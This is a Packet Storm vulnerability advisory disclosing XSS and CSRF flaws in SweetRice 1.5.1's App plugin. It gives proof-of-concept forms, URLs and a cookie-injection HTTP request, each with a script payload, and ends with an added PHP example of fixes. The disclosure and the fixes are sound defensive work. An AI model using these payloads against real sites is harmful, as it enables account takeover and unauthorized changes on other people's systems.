SweetRice 1.5.1 Cross Site Request Forgery / Cross Site Scripting

2016-11-07T00:00:00
ID PACKETSTORM:139590
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2016-11-07T00:00:00

Description

                                        
                                            `<!--  
Title: SweetRice App Plugin - Multiple XSS / CSRF  
Application: App Plugin  
Versions Affected: 1.0  
Vendor URL: http://www.basic-cms.org/  
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip  
Discovered by: Ashiyane Digital Security Team  
Bugs: CSRF & XSS  
Date: 17-Sept-2016  
  
Proof of Concept:  
  
1. Stored XSS in Custom App URL:  
Vulnerable Parameter: url[home]  
-->  
<form method="post"   
action="http://localhost/as/?app_mode=links&plugin=App&type=plugin">  
<input type="text" name="url[home]"   
value='"><script>alert(1)</script>'>  
<input type="hidden" name="lids[home]" value="1">  
<input type="submit" value="Done">  
</form>  
<!--  
2. XSS in Search:  
http://localhost/1/as/?type=plugin&plugin=App&app_mode=database&keyword="><script>alert(1)</script>  
  
3. XSS in Page Limit:  
The payload is injected through the cookie.  
Vulnerable Parameter: page_limit  
Headers:  
  
GET /as/?app_mode=database&plugin=App&type=plugin& HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/1/as/?app_mode=database&plugin=App&type=plugin&  
Cookie: dashboad_bg=#3f0840; page_limit="><script>alert(1)</script>; admin=admin; passwd=5f4dcc3b5aa765d61d8327deb882cf99; lang=en-us; __atuvc=15|41; grav-tabs-state={"tab-content.options.advanced":"data.content"}; sweetrice=5h30gqavosudpnferatlh9oca4  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
  
4. Stored XSS and CSRF in Create Form:  
-->  
<form method="post"   
action="http://localhost/1/as/?type=plugin&plugin=App&app_mode=form&mode=insert">  
<input type="hidden" name="id" value="">  
<input type="hidden" id="name" name="name"   
value='<script>alert(1)</script>'>  
<input type="hidden" id="action" name="action"   
value='<script>alert(2)</script>'>  
<input type="submit" value="Done">  
</form>  
  
<!--  
5. XSS in Search:  
http://localhost/1/as/?type=plugin&plugin=App&app_mode=form&search="><script>alert(1)</script>  
-->  
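The following is an added example, not code from the advisory or from SweetRice itself, showing how a PHP handler for the inputs named above (the url[home] form field, the keyword and search query parameters, the page_limit cookie, and the create-form POST) closes both bug classes reported: a per-session token checked on every state-changing POST against the CSRF, HTML encoding of every value that is reflected into the page against the XSS, and integer validation of page_limit so the cookie value is never echoed at all. The function names and the csrf_token session key are assumptions for illustration.

```php
<?php
// Added example (not SweetRice code). Function names and the session key
// 'csrf_token' are hypothetical; the parameter names are those from the advisory.
declare(strict_types=1);

// Encode an untrusted value for an HTML body or attribute context. ENT_QUOTES
// covers both quote styles, which is what stops the  "><script>  break-out
// used in the PoC when the value sits inside value="...".
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// One random token per session; every state-changing form carries it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A cross-site form cannot read the victim's session, so it cannot supply the
// token; hash_equals keeps the comparison constant-time.
function csrf_check(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// page_limit is only ever a small integer: validate it and fall back to a
// default, rather than reflecting the raw cookie string into the page.
function page_limit_from_cookie(array $cookie, int $default = 20): int
{
    $raw = $cookie['page_limit'] ?? '';
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 500]]);
    return $n === false ? $default : $n;
}

// Render the links/search form with every reflected value encoded.
function render_links_form(array $urls, string $keyword, int $limit): string
{
    $home = h(is_string($urls['home'] ?? null) ? $urls['home'] : '');
    return '<form method="post" action="?app_mode=links&amp;plugin=App&amp;type=plugin">'
        . '<input type="hidden" name="csrf_token" value="' . h(csrf_token()) . '">'
        . '<input type="text" name="url[home]" value="' . $home . '">'
        . '<input type="text" name="keyword" value="' . h($keyword) . '">'
        . '<input type="hidden" name="page_limit" value="' . $limit . '">'
        . '<input type="submit" value="Done">'
        . '</form>';
}

session_start();

// Reject any POST (links update, form insert) that lacks a valid token.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    // Persist $_POST['url'] / $_POST['name'] / $_POST['action'] here; stored
    // values are still passed through h() on every later output.
}

$urls    = is_array($_POST['url'] ?? null) ? $_POST['url'] : [];
$keyword = is_string($_GET['keyword'] ?? null) ? $_GET['keyword'] : '';
$limit   = page_limit_from_cookie($_COOKIE);

echo render_links_form($urls, $keyword, $limit);
```

The same h() wrapper applies to the create-form fields (name, action) and the form-search parameter from items 4 and 5; the point is that encoding happens at output time, in the context the value lands in, and that the token check is tied to the session rather than to anything the attacker's page can forge.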